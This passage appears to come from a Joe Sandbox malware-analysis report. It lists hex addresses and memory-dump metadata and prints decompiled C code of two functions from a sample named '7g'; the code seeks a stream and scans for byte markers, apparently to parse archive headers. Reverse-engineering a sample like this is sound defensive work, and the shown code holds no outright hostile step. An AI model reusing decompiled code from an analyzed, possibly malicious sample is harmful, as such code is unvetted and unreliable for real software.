                                                                                                                    0x00b25264
                                                                                                                    0x00b25270
                                                                                                                    0x00b25276
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25276
                                                                                                                    0x00b25266
                                                                                                                    0x00b2526c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2526e
                                                                                                                    0x00b2522f
                                                                                                                    0x00b25232
                                                                                                                    0x00b2524a
                                                                                                                    0x00b2524a
                                                                                                                    0x00b2524c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2524e
                                                                                                                    0x00b25245
                                                                                                                    0x00b25245
                                                                                                                    0x00000000
                                                                                                                    0x00b25245
                                                                                                                    0x00b25234
                                                                                                                    0x00b25237
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2523d
                                                                                                                    0x00b25243
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25243
                                                                                                                    0x00b25210
                                                                                                                    0x00b25216
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b25216
                                                                                                                    0x00b251d3
                                                                                                                    0x00b251d6
                                                                                                                    0x00b251d8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b251de
                                                                                                                    0x00b251e1
                                                                                                                    0x00b251e3
                                                                                                                    0x00b251e6
                                                                                                                    0x00b251f4
                                                                                                                    0x00b251f4
                                                                                                                    0x00b251f7
                                                                                                                    0x00b251fe
                                                                                                                    0x00b251fe
                                                                                                                    0x00b25201
                                                                                                                    0x00b25201
                                                                                                                    0x00b25202
                                                                                                                    0x00000000
                                                                                                                    0x00b25202
                                                                                                                    0x00b251f9
                                                                                                                    0x00b251fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b251fc
                                                                                                                    0x00b251e8
                                                                                                                    0x00b251ee
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b251f0
                                                                                                                    0x00000000
                                                                                                                    0x00b251f0
                                                                                                                    0x00b251be
                                                                                                                    0x00b251c3
                                                                                                                    0x00b251c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b251c5
                                                                                                                    0x00b2519f
                                                                                                                    0x00b251a5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b251a5
                                                                                                                    0x00b2512a
                                                                                                                    0x00b2512f
                                                                                                                    0x00b25146
                                                                                                                    0x00b2514a
                                                                                                                    0x00b25153
                                                                                                                    0x00000000
                                                                                                                    0x00b25153
                                                                                                                    0x00b25131
                                                                                                                    0x00b25136
                                                                                                                    0x00b25139
                                                                                                                    0x00000000
                                                                                                                    0x00b25139
                                                                                                                    0x00b25120
                                                                                                                    0x00000000
                                                                                                                    0x00b25120

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 7c8f96e1bbe1dffb24a169dc287ae945e78f405e25320d41b2a01c36d657b46a
                                                                                                                    • Instruction ID: 2b728b3d89330b08ee8ee82cc552f78c452d82d44283847d0c2c5a0752b527e8
                                                                                                                    • Opcode Fuzzy Hash: 7c8f96e1bbe1dffb24a169dc287ae945e78f405e25320d41b2a01c36d657b46a
                                                                                                                    • Instruction Fuzzy Hash: F2F1B971501B95DFCB31DF64D4A0AEABBE1FF19300F5848AEE49A9B251D330B984CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B5D01D Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00B5D01D(intOrPtr* __ecx) {
				void* __ebx;
				char* _t157;
				signed int _t158;
				intOrPtr _t164;
				intOrPtr _t169;
				intOrPtr* _t172;
				signed int _t173;
				void* _t174;
				void* _t177;
				signed int _t181;
				void* _t187;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				signed int _t211;
				signed int _t212;
				intOrPtr _t215;
				signed int _t221;
				signed int _t223;
				void* _t226;
				signed int _t243;
				intOrPtr* _t244;
				void* _t246;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t257;
				intOrPtr _t264;
				intOrPtr* _t267;
				void* _t269;

				L00B7F140(0xb87938, _t269);
				_t264 =  *((intOrPtr*)(_t269 + 8));
				_t267 = __ecx;
				L00B59139(_t264);
				 *((intOrPtr*)(_t264 + 0x100)) =  *((intOrPtr*)(__ecx + 0x40));
				 *((intOrPtr*)(_t264 + 0x104)) =  *((intOrPtr*)(__ecx + 0x44));
				_t157 = _t264 + 0xf8;
				 *_t157 =  *((intOrPtr*)(__ecx + 0x5e));
				 *((char*)(_t264 + 0xf9)) =  *((intOrPtr*)(__ecx + 0x5f));
				if( *_t157 != 0) {
					L37:
					_t158 = 1;
					L38:
					 *[fs:0x0] =  *((intOrPtr*)(_t269 - 0xc));
					return _t158;
				}
				_t249 =  *(__ecx + 0x64);
				_t221 =  *(__ecx + 0x68);
				_t211 =  *(__ecx + 0x6c);
				 *(_t269 - 0x20) =  *(__ecx + 0x70);
				 *((intOrPtr*)(_t269 + 8)) =  *((intOrPtr*)(__ecx + 0x74));
				 *(_t269 - 0x14) = _t249;
				 *(_t269 - 0x10) = _t221;
				if( *((intOrPtr*)(__ecx + 0x60)) != 0 || (_t249 | _t221) != 0 || (_t211 |  *(_t269 - 0x20)) != 0 ||  *((intOrPtr*)(_t269 + 8)) != 0) {
					L22:
					 *((intOrPtr*)(_t264 + 0x108)) =  *((intOrPtr*)(_t267 + 0x40)) + 0x20;
					_t164 = 0x20;
					asm("adc ecx, 0x0");
					 *(_t264 + 0x148) =  *(_t264 + 0x148) & 0x00000000;
					 *((intOrPtr*)(_t264 + 0x140)) = _t164;
					 *(_t264 + 0x144) =  *(_t264 + 0x144) & 0x00000000;
					__eflags =  *(_t269 - 0x10);
					 *((intOrPtr*)(_t264 + 0x10c)) =  *((intOrPtr*)(_t267 + 0x44));
					if(__eflags < 0) {
						goto L37;
					}
					if(__eflags > 0) {
						L25:
						_t223 =  *(_t269 - 0x20);
						__eflags = _t223 - 0x40000000;
						if(__eflags > 0) {
							goto L37;
						}
						if(__eflags < 0) {
							L28:
							 *((intOrPtr*)(_t267 + 0x78)) = _t164;
							 *(_t267 + 0x7c) =  *(_t267 + 0x7c) & 0x00000000;
							__eflags = _t211 | _t223;
							if((_t211 | _t223) != 0) {
								__eflags =  *((char*)(_t264 + 0x14c));
								if( *((char*)(_t264 + 0x14c)) == 0) {
									 *(_t264 + 0x148) = 1;
								}
								 *((intOrPtr*)(_t267 + 0x78)) =  *((intOrPtr*)(_t267 + 0x78)) + _t211;
								 *(_t267 + 0x50) = _t249;
								 *(_t267 + 0x54) =  *(_t269 - 0x10);
								asm("adc [esi+0x7c], ecx");
								_t169 = _t211 + _t249;
								_t250 = _t223;
								 *((intOrPtr*)(_t269 - 0x48)) = _t169;
								asm("adc edx, [ebp-0x10]");
								 *((intOrPtr*)(_t264 + 0x140)) = _t169 + 0x20;
								asm("adc ecx, 0x0");
								 *(_t264 + 0x144) = _t250;
								_t226 =  *((intOrPtr*)(_t267 + 0x48)) -  *((intOrPtr*)(_t264 + 0x108));
								asm("sbb eax, [edi+0x10c]");
								__eflags =  *((intOrPtr*)(_t267 + 0x4c)) - _t250;
								if(__eflags > 0) {
									L39:
									_t172 =  *_t267;
									_t158 =  *((intOrPtr*)( *_t172 + 0x10))(_t172,  *(_t269 - 0x14),  *(_t269 - 0x10), 1, 0);
									__eflags = _t158;
									if(_t158 != 0) {
										goto L38;
									}
									__eflags = _t211 - _t211;
									if(_t211 != _t211) {
										L42:
										_t158 = 0x8007000e;
										goto L38;
									}
									__eflags = _t158 -  *(_t269 - 0x20);
									if(_t158 ==  *(_t269 - 0x20)) {
										 *(_t269 - 0x1c) =  *(_t269 - 0x1c) & 0x00000000;
										 *(_t269 - 0x18) =  *(_t269 - 0x18) & 0x00000000;
										__eflags = _t211;
										if(__eflags != 0) {
											_push(_t211);
											 *(_t269 - 0x1c) = E00B11E55();
											 *(_t269 - 0x18) = _t211;
										}
										 *(_t269 - 4) =  *(_t269 - 4) & 0x00000000;
										_t173 = E00B1FEB1(__eflags, _t211); // executed
										__eflags = _t173;
										if(_t173 == 0) {
											_t229 =  *(_t269 - 0x1c);
											_t252 = _t211;
											_t174 = E00B7E140( *(_t269 - 0x1c), _t252);
											__eflags = _t174 -  *((intOrPtr*)(_t269 + 8));
											if(_t174 !=  *((intOrPtr*)(_t269 + 8))) {
												E00B5AEB1(_t229);
											}
											__eflags =  *((char*)(_t264 + 0x14c));
											if( *((char*)(_t264 + 0x14c)) == 0) {
												 *((char*)(_t264 + 0x149)) = 1;
											}
											 *(_t269 - 0x28) =  *(_t269 - 0x28) & 0x00000000;
											 *(_t269 - 0x27) =  *(_t269 - 0x27) & 0x00000000;
											 *(_t269 - 4) = 1;
											L00B5AE47(_t267, _t269 - 0x1c);
											_t212 = 0;
											 *((intOrPtr*)(_t269 - 0x38)) = 0;
											 *((intOrPtr*)(_t269 - 0x34)) = 0;
											 *((intOrPtr*)(_t269 - 0x30)) = 0;
											_t231 =  *((intOrPtr*)(_t267 + 0x38));
											 *(_t269 - 4) = 2;
											_t177 = L00B5AF91( *((intOrPtr*)(_t267 + 0x38)));
											__eflags = _t177 - 1;
											if(_t177 != 1) {
												L53:
												__eflags = _t177 - 0x17;
												if(_t177 != 0x17) {
													L55:
													E00B5AEB1(_t231);
													L56:
													_t232 = _t267;
													_t181 = E00B5C5F8(_t267, _t252, __eflags,  *((intOrPtr*)(_t264 + 0x108)),  *((intOrPtr*)(_t264 + 0x10c)), _t264 + 0x118, _t269 - 0x38,  *((intOrPtr*)(_t269 + 0xc)),  *((intOrPtr*)(_t269 + 0x10)),  *((intOrPtr*)(_t269 + 0x14)),  *((intOrPtr*)(_t269 + 0x18))); // executed
													__eflags = _t181 - _t212;
													if(_t181 != _t212) {
														goto L64;
													}
													__eflags =  *((intOrPtr*)(_t269 - 0x34)) - _t212;
													if( *((intOrPtr*)(_t269 - 0x34)) == _t212) {
														goto L65;
													}
													__eflags =  *((intOrPtr*)(_t269 - 0x34)) - 1;
													if( *((intOrPtr*)(_t269 - 0x34)) > 1) {
														E00B5AEB1(_t232);
													}
													E00B5ADCE(_t269 - 0x2c);
													L00B5AE47(_t267,  *((intOrPtr*)( *((intOrPtr*)(_t269 - 0x38)))));
													_t238 =  *((intOrPtr*)(_t267 + 0x38));
													_t187 = L00B5AF91( *((intOrPtr*)(_t267 + 0x38)));
													__eflags = _t187 - 1;
													if(_t187 != 1) {
														L62:
														E00B5AEB1(_t238);
														goto L63;
													}
													__eflags = _t252 - _t212;
													if(__eflags == 0) {
														goto L63;
													}
													goto L62;
												}
												__eflags = _t252 - _t212;
												if(__eflags == 0) {
													goto L56;
												}
												goto L55;
											} else {
												__eflags = _t252;
												if(__eflags == 0) {
													L63:
													 *(_t264 + 0x148) = 1;
													 *((intOrPtr*)(_t264 + 0x138)) =  *((intOrPtr*)(_t267 + 0x78));
													 *(_t264 + 0x13c) =  *(_t267 + 0x7c);
													_t181 = E00B5C88D(_t267, _t252, __eflags, _t264,  *((intOrPtr*)(_t269 + 0xc)),  *((intOrPtr*)(_t269 + 0x10)),  *((intOrPtr*)(_t269 + 0x14)),  *((intOrPtr*)(_t269 + 0x18)));
													L64:
													_t212 = _t181;
													L65:
													 *(_t269 - 4) = 1;
													L00B41B84(_t212, _t269 - 0x38);
													_t148 = _t269 - 4;
													 *_t148 =  *(_t269 - 4) & 0x00000000;
													__eflags =  *_t148;
													_t173 = E00B5ADCE(_t269 - 0x2c);
													goto L66;
												}
												goto L53;
											}
										} else {
											_t212 = _t173;
											L66:
											E00B11E89(_t173,  *(_t269 - 0x1c));
											_t158 = _t212;
											goto L38;
										}
									}
									goto L42;
								} else {
									if(__eflags < 0) {
										L36:
										 *((char*)(_t264 + 0x14b)) = 1;
										goto L37;
									}
									__eflags = _t226 -  *((intOrPtr*)(_t269 - 0x48));
									if(_t226 >=  *((intOrPtr*)(_t269 - 0x48))) {
										goto L39;
									}
									goto L36;
								}
							}
							__eflags = _t249 |  *(_t269 - 0x10);
							if((_t249 |  *(_t269 - 0x10)) != 0) {
								goto L37;
							}
							 *(_t264 + 0x148) = 1;
							 *((intOrPtr*)(_t264 + 0x138)) =  *((intOrPtr*)(_t267 + 0x78));
							 *(_t264 + 0x13c) =  *(_t267 + 0x7c);
							_t158 = 0;
							goto L38;
						}
						__eflags = _t211;
						if(_t211 > 0) {
							goto L37;
						}
						goto L28;
					}
					__eflags = _t249;
					if(_t249 < 0) {
						goto L37;
					}
					goto L25;
				} else {
					_t200 =  *__ecx;
					_t158 =  *((intOrPtr*)( *_t200 + 0x10))(_t200, 0, 0, 1, _t269 - 0x40);
					if(_t158 != 0) {
						goto L38;
					}
					_t201 =  *__ecx;
					_t158 =  *((intOrPtr*)( *_t201 + 0x10))(_t201, 0, 0, 2, _t269 - 0x58);
					if(_t158 != 0) {
						goto L38;
					}
					_t202 =  *((intOrPtr*)(_t269 - 0x58));
					_t243 =  *(_t269 - 0x54);
					_t257 = _t202 -  *((intOrPtr*)(_t269 - 0x40));
					asm("sbb ebx, [ebp-0x3c]");
					 *((intOrPtr*)(_t269 - 0x50)) = _t257;
					 *(_t269 - 0x4c) = _t243;
					_t215 = 0x200;
					if(_t257 != 0 || _t257 >= 0x200) {
						L10:
						asm("sbb ecx, edx");
						 *(_t269 - 0x44) = _t243;
						_t244 =  *_t267;
						_t158 =  *((intOrPtr*)( *_t244 + 0x10))(_t244, _t202 - _t215,  *(_t269 - 0x44), 0, 0);
						_t284 = _t158;
						if(_t158 != 0) {
							goto L38;
						}
						_t158 = E00B1FEB1(_t284, _t215);
						if(_t158 != 0) {
							goto L38;
						}
						if( *((intOrPtr*)(_t269 + _t215 - 0x259)) != _t158) {
							goto L37;
						}
						_t37 = _t215 - 2; // 0x1fe
						_t246 = _t37;
						while(1) {
							_t204 =  *((intOrPtr*)(_t269 + _t246 - 0x258));
							if(_t204 == 0x17 &&  *((char*)(_t269 + _t246 - 0x257)) == 6) {
								break;
							}
							if(_t204 != 1 ||  *((char*)(_t269 + _t246 - 0x257)) != 4) {
								if(_t246 == 0) {
									goto L37;
								}
								_t246 = _t246 - 1;
								continue;
							} else {
								break;
							}
						}
						 *(_t269 - 0x20) =  *(_t269 - 0x20) & 0x00000000;
						_t211 = _t215 - _t246;
						asm("sbb edx, [ebp-0x20]");
						 *(_t269 - 0x14) =  *((intOrPtr*)(_t269 - 0x50)) - _t211;
						 *(_t269 - 0x10) =  *(_t269 - 0x4c);
						_t207 = E00B7E140(_t269 + _t246 - 0x258, _t211);
						 *((intOrPtr*)(_t269 + 8)) = _t207;
						_t208 =  *_t267;
						_t158 =  *((intOrPtr*)( *_t208 + 0x10))(_t208,  *((intOrPtr*)(_t269 - 0x40)),  *((intOrPtr*)(_t269 - 0x3c)), 0, 0);
						__eflags = _t158;
						if(_t158 != 0) {
							goto L38;
						}
						_t249 =  *(_t269 - 0x14);
						 *((char*)(_t264 + 0x14c)) = 1;
						goto L22;
					} else {
						_t215 = _t257;
						if(_t257 < 3) {
							goto L37;
						}
						goto L10;
					}
				}
			}




































                                                                                                                    0x00b5d022
                                                                                                                    0x00b5d030
                                                                                                                    0x00b5d033
                                                                                                                    0x00b5d037
                                                                                                                    0x00b5d03f
                                                                                                                    0x00b5d048
                                                                                                                    0x00b5d051
                                                                                                                    0x00b5d057
                                                                                                                    0x00b5d05f
                                                                                                                    0x00b5d065
                                                                                                                    0x00b5d2c2
                                                                                                                    0x00b5d2c4
                                                                                                                    0x00b5d2c5
                                                                                                                    0x00b5d2cb
                                                                                                                    0x00b5d2d3
                                                                                                                    0x00b5d2d3
                                                                                                                    0x00b5d06e
                                                                                                                    0x00b5d071
                                                                                                                    0x00b5d074
                                                                                                                    0x00b5d077
                                                                                                                    0x00b5d07d
                                                                                                                    0x00b5d085
                                                                                                                    0x00b5d088
                                                                                                                    0x00b5d08b
                                                                                                                    0x00b5d1d0
                                                                                                                    0x00b5d1db
                                                                                                                    0x00b5d1e1
                                                                                                                    0x00b5d1e2
                                                                                                                    0x00b5d1e5
                                                                                                                    0x00b5d1ec
                                                                                                                    0x00b5d1f2
                                                                                                                    0x00b5d1f9
                                                                                                                    0x00b5d1fd
                                                                                                                    0x00b5d203
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d209
                                                                                                                    0x00b5d213
                                                                                                                    0x00b5d213
                                                                                                                    0x00b5d216
                                                                                                                    0x00b5d21c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d222
                                                                                                                    0x00b5d22c
                                                                                                                    0x00b5d22c
                                                                                                                    0x00b5d22f
                                                                                                                    0x00b5d235
                                                                                                                    0x00b5d237
                                                                                                                    0x00b5d25f
                                                                                                                    0x00b5d266
                                                                                                                    0x00b5d268
                                                                                                                    0x00b5d268
                                                                                                                    0x00b5d26f
                                                                                                                    0x00b5d275
                                                                                                                    0x00b5d278
                                                                                                                    0x00b5d27d
                                                                                                                    0x00b5d280
                                                                                                                    0x00b5d282
                                                                                                                    0x00b5d284
                                                                                                                    0x00b5d287
                                                                                                                    0x00b5d28d
                                                                                                                    0x00b5d295
                                                                                                                    0x00b5d298
                                                                                                                    0x00b5d2a1
                                                                                                                    0x00b5d2aa
                                                                                                                    0x00b5d2b0
                                                                                                                    0x00b5d2b2
                                                                                                                    0x00b5d2d6
                                                                                                                    0x00b5d2d6
                                                                                                                    0x00b5d2e5
                                                                                                                    0x00b5d2e8
                                                                                                                    0x00b5d2ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d2ec
                                                                                                                    0x00b5d2ee
                                                                                                                    0x00b5d2f5
                                                                                                                    0x00b5d2f5
                                                                                                                    0x00000000
                                                                                                                    0x00b5d2f5
                                                                                                                    0x00b5d2f0
                                                                                                                    0x00b5d2f3
                                                                                                                    0x00b5d2fc
                                                                                                                    0x00b5d300
                                                                                                                    0x00b5d304
                                                                                                                    0x00b5d306
                                                                                                                    0x00b5d308
                                                                                                                    0x00b5d30f
                                                                                                                    0x00b5d312
                                                                                                                    0x00b5d312
                                                                                                                    0x00b5d31a
                                                                                                                    0x00b5d31f
                                                                                                                    0x00b5d324
                                                                                                                    0x00b5d326
                                                                                                                    0x00b5d32f
                                                                                                                    0x00b5d332
                                                                                                                    0x00b5d334
                                                                                                                    0x00b5d339
                                                                                                                    0x00b5d33c
                                                                                                                    0x00b5d33e
                                                                                                                    0x00b5d33e
                                                                                                                    0x00b5d343
                                                                                                                    0x00b5d34a
                                                                                                                    0x00b5d34c
                                                                                                                    0x00b5d34c
                                                                                                                    0x00b5d353
                                                                                                                    0x00b5d357
                                                                                                                    0x00b5d363
                                                                                                                    0x00b5d367
                                                                                                                    0x00b5d36c
                                                                                                                    0x00b5d36e
                                                                                                                    0x00b5d371
                                                                                                                    0x00b5d374
                                                                                                                    0x00b5d377
                                                                                                                    0x00b5d37a
                                                                                                                    0x00b5d37e
                                                                                                                    0x00b5d383
                                                                                                                    0x00b5d386
                                                                                                                    0x00b5d38c
                                                                                                                    0x00b5d38c
                                                                                                                    0x00b5d38f
                                                                                                                    0x00b5d395
                                                                                                                    0x00b5d395
                                                                                                                    0x00b5d39a
                                                                                                                    0x00b5d3a0
                                                                                                                    0x00b5d3bf
                                                                                                                    0x00b5d3c4
                                                                                                                    0x00b5d3c6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d3c8
                                                                                                                    0x00b5d3cb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d3cd
                                                                                                                    0x00b5d3d1
                                                                                                                    0x00b5d3d3
                                                                                                                    0x00b5d3d3
                                                                                                                    0x00b5d3db
                                                                                                                    0x00b5d3e9
                                                                                                                    0x00b5d3ee
                                                                                                                    0x00b5d3f1
                                                                                                                    0x00b5d3f6
                                                                                                                    0x00b5d3f9
                                                                                                                    0x00b5d3ff
                                                                                                                    0x00b5d3ff
                                                                                                                    0x00000000
                                                                                                                    0x00b5d3ff
                                                                                                                    0x00b5d3fb
                                                                                                                    0x00b5d3fd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d3fd
                                                                                                                    0x00b5d391
                                                                                                                    0x00b5d393
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d388
                                                                                                                    0x00b5d388
                                                                                                                    0x00b5d38a
                                                                                                                    0x00b5d404
                                                                                                                    0x00b5d407
                                                                                                                    0x00b5d416
                                                                                                                    0x00b5d422
                                                                                                                    0x00b5d42c
                                                                                                                    0x00b5d431
                                                                                                                    0x00b5d431
                                                                                                                    0x00b5d433
                                                                                                                    0x00b5d436
                                                                                                                    0x00b5d43a
                                                                                                                    0x00b5d43f
                                                                                                                    0x00b5d43f
                                                                                                                    0x00b5d43f
                                                                                                                    0x00b5d446
                                                                                                                    0x00000000
                                                                                                                    0x00b5d446
                                                                                                                    0x00000000
                                                                                                                    0x00b5d38a
                                                                                                                    0x00b5d328
                                                                                                                    0x00b5d328
                                                                                                                    0x00b5d44b
                                                                                                                    0x00b5d44e
                                                                                                                    0x00b5d454
                                                                                                                    0x00000000
                                                                                                                    0x00b5d454
                                                                                                                    0x00b5d326
                                                                                                                    0x00000000
                                                                                                                    0x00b5d2b4
                                                                                                                    0x00b5d2b4
                                                                                                                    0x00b5d2bb
                                                                                                                    0x00b5d2bb
                                                                                                                    0x00000000
                                                                                                                    0x00b5d2bb
                                                                                                                    0x00b5d2b6
                                                                                                                    0x00b5d2b9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d2b9
                                                                                                                    0x00b5d2b2
                                                                                                                    0x00b5d239
                                                                                                                    0x00b5d23c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d242
                                                                                                                    0x00b5d24c
                                                                                                                    0x00b5d255
                                                                                                                    0x00b5d25b
                                                                                                                    0x00000000
                                                                                                                    0x00b5d25b
                                                                                                                    0x00b5d224
                                                                                                                    0x00b5d226
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d226
                                                                                                                    0x00b5d20b
                                                                                                                    0x00b5d20d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d0b1
                                                                                                                    0x00b5d0b1
                                                                                                                    0x00b5d0be
                                                                                                                    0x00b5d0c3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d0c9
                                                                                                                    0x00b5d0d8
                                                                                                                    0x00b5d0dd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d0e3
                                                                                                                    0x00b5d0e6
                                                                                                                    0x00b5d0ed
                                                                                                                    0x00b5d0f0
                                                                                                                    0x00b5d0f3
                                                                                                                    0x00b5d0f6
                                                                                                                    0x00b5d0f9
                                                                                                                    0x00b5d0fe
                                                                                                                    0x00b5d10f
                                                                                                                    0x00b5d113
                                                                                                                    0x00b5d117
                                                                                                                    0x00b5d11a
                                                                                                                    0x00b5d125
                                                                                                                    0x00b5d128
                                                                                                                    0x00b5d12a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d139
                                                                                                                    0x00b5d140
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d14d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d153
                                                                                                                    0x00b5d153
                                                                                                                    0x00b5d156
                                                                                                                    0x00b5d156
                                                                                                                    0x00b5d15f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d16d
                                                                                                                    0x00b5d17b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d181
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d16d
                                                                                                                    0x00b5d187
                                                                                                                    0x00b5d18e
                                                                                                                    0x00b5d199
                                                                                                                    0x00b5d19c
                                                                                                                    0x00b5d19f
                                                                                                                    0x00b5d1a4
                                                                                                                    0x00b5d1b0
                                                                                                                    0x00b5d1b3
                                                                                                                    0x00b5d1bb
                                                                                                                    0x00b5d1be
                                                                                                                    0x00b5d1c0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d1c6
                                                                                                                    0x00b5d1c9
                                                                                                                    0x00000000
                                                                                                                    0x00b5d104
                                                                                                                    0x00b5d107
                                                                                                                    0x00b5d109
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5d109
                                                                                                                    0x00b5d0fe

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 0c33e423deddb88feaa2300c42b46bb0252f1a438de21fc8be85d43be93dc8dc
                                                                                                                    • Instruction ID: aab7df1b52b00f1a56688d58fe163b751f6c3c6b5a6002e760fca865fa5b09ce
                                                                                                                    • Opcode Fuzzy Hash: 0c33e423deddb88feaa2300c42b46bb0252f1a438de21fc8be85d43be93dc8dc
                                                                                                                    • Instruction Fuzzy Hash: DBD18F70A00645AFDF29CFA4C884BEEBBF1FF58301F1046ADE955A7251D771A888CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B58F13 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B58F13() {
				void* __ebx;
				intOrPtr _t66;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr _t76;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr* _t87;
				intOrPtr* _t88;
				void* _t97;
				void* _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t116;
				void* _t118;
				void* _t120;

				L00B7F140(0xb876ab, _t118);
				_t116 =  *((intOrPtr*)(_t118 + 8));
				 *((intOrPtr*)(_t118 - 0x10)) = _t120 - 0x90;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				 *((intOrPtr*)( *_t116 + 0x10))(_t116, _t112, _t115, _t97);
				_t113 =  *((intOrPtr*)(_t118 + 0x14));
				 *((intOrPtr*)(_t116 + 0x220)) = 0;
				 *((char*)(_t118 - 4)) = 1;
				 *((intOrPtr*)(_t118 - 0x14)) = _t113;
				if(_t113 != 0) {
					 *((intOrPtr*)( *_t113 + 4))(_t113);
				}
				 *((intOrPtr*)(_t118 + 0x14)) = 0;
				_t124 = _t113;
				 *((char*)(_t118 - 4)) = 3;
				if(_t113 != 0) {
					 *((intOrPtr*)( *_t113))(_t113, 0xb8d1a0, _t118 + 0x14);
				}
				 *((intOrPtr*)(_t118 - 0x9c)) = 0;
				 *((intOrPtr*)(_t118 - 0x98)) = 0;
				 *((char*)(_t118 - 0x1c)) =  *((intOrPtr*)(_t116 + 0xa6));
				 *((char*)(_t118 - 4)) = 4;
				 *((char*)(_t116 + 0x1f8)) = 0;
				_t66 = E00B5B38F(_t118 - 0x9c, _t118, _t124,  *((intOrPtr*)(_t118 + 0xc)),  *((intOrPtr*)(_t118 + 0x10)));
				 *((intOrPtr*)(_t118 + 0x10)) = _t66;
				if(_t66 == 0) {
					 *((char*)(_t116 + 0x1f8)) = 1;
